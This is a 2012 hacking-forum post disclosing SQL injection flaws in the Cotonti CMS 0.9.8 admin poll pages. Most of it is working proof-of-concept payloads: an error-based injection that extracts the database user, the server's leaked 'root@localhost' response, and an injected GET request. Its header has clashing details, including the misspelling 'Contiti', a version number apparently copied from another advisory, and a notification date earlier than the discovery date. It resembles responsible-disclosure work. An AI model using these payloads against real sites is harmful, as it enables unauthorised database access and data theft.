Close

  • SQL Injection in Cotonti 0.9.8

    • Results 1 to 1 of 1
    Like Tree1Likes
    • 1 Post By vekt0r

    Thread: SQL Injection in Cotonti 0.9.8

    1. 10th April 2012, 14:20 #1
      vekt0r
      vekt0r is offline
      Join Date
      Apr 2012
      Posts
      8
      Rep Power
      3

      SQL Injection in Cotonti 0.9.8

      # Exploit Title: SQL Injection in Contiti CMS 0.9.8
      # Date: 10/04/2012
      # Author: vekt0r
      # Software: Contiti CMS 0.9.8
      # Version: v3.5.1
      # Tested on: Windows XP, XAMPP

      Application Info:
      Cotonti combines the flexibility of a web framework with the rapid deployability and featureset of a content management system. Despite having features such as user accounts, content creation, file management and community tools out of the box, it can be easily extended using modules or plugins. Cotonti is powered by its own template engine which is both fast and easy to learn, even if you are not an experienced programmer.

      Vulnerability Details:
      The poll_id parameter in the admin area vulnerable to SQL injection. The page can be used to inject various injection strings to attack the underlying database. Also discovered in id parameter in Bump Poll functionality in admin area.

      Code:
      #####################################

      SQL injection 1
      POC - Throw SQL error
      x=e4b7f5c5a74f45a4&poll_id=16'&poll_text=test&poll _option[id31]=test&poll_option[id32]=test&poll_option[]=&poll_multiple=0&poll_state=0&poll_reset=0&poll_d elete=0

      POC - Error-Based

      x=e4b7f5c5a74f45a4&poll_id=16 AND (SELECT 1583 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,115,120,58),(MID((IFNU LL(CAST(CURRENT_USER() AS CHAR),CHAR(32))),1,50)),CHAR(58,122,112,103,58),FL OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&poll_text=test&poll_option[id31]=test'&poll_option[id32]=test&poll_option[]=&poll_multiple=0&poll_state=0&poll_reset=0&poll_d elete=0

      Response:
      <h2 class="warning">Fatal error</h2><div class="warning">
      <p><em>2012-04-05 14:42</em></p><p>SQL error 23000: Integrity constraint violation: 1062 Duplicate entry ':xsx:root@localhost:zpg:1' for key 'group_key'</p><pre style="overflow:auto">#0 cot_diefatal(SQL error 23000: Integrity constraint violation: 1062 Duplicate entry ':xsx:root@localhost:zpg:1' for key 'group_key')

      SQL injection 2
      ID Parameter
      GET /cotonti-update/admin.php?m=polls&a=bump&id=125'&x=8f768a8788d1ef2 f


      Timeline:
      05-04-2012 Vulnerability discovered
      05-04-2011 Vendor notified, Additional instances discovered. Vendor fix implemented in latest branch (https://github.com/Cotonti/Cotonti/zipball/master)
      10-04-2012 Public disclosure
      Last edited by vekt0r; 10th April 2012 at 14:28.
      encrypt likes this.
      Reply With Quote Reply With Quote
    « SQL Injection in Horizon Quick CMS v3.5.1 | SQL Injection, Directory Traversal and LFI in LightNEazy 3.2.5 »

    Similar Threads

    1. [Question] SQL injection on port!?
      By aperfectcircle1 in forum General Hacking Discussions
      Replies: 3
      Last Post: 16th June 2010, 15:25
    2. delete with sql injection
      By ccoder in forum General Hacking Discussions
      Replies: 1
      Last Post: 9th May 2010, 17:52
    3. SQL Injection Tools
      By InterIdiot in forum Hacking Tools & Utilities
      Replies: 2
      Last Post: 12th March 2010, 14:39
    4. SQL Injection - From Bug to Shell
      By MaXe in forum Web Hacking & War Games
      Replies: 7
      Last Post: 19th October 2009, 22:44
    5. SQL Injection on Facebook
      By Erratum in forum Security News and Feeds
      Replies: 1
      Last Post: 3rd September 2009, 11:16

    Bookmarks

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •  

    Forum Rules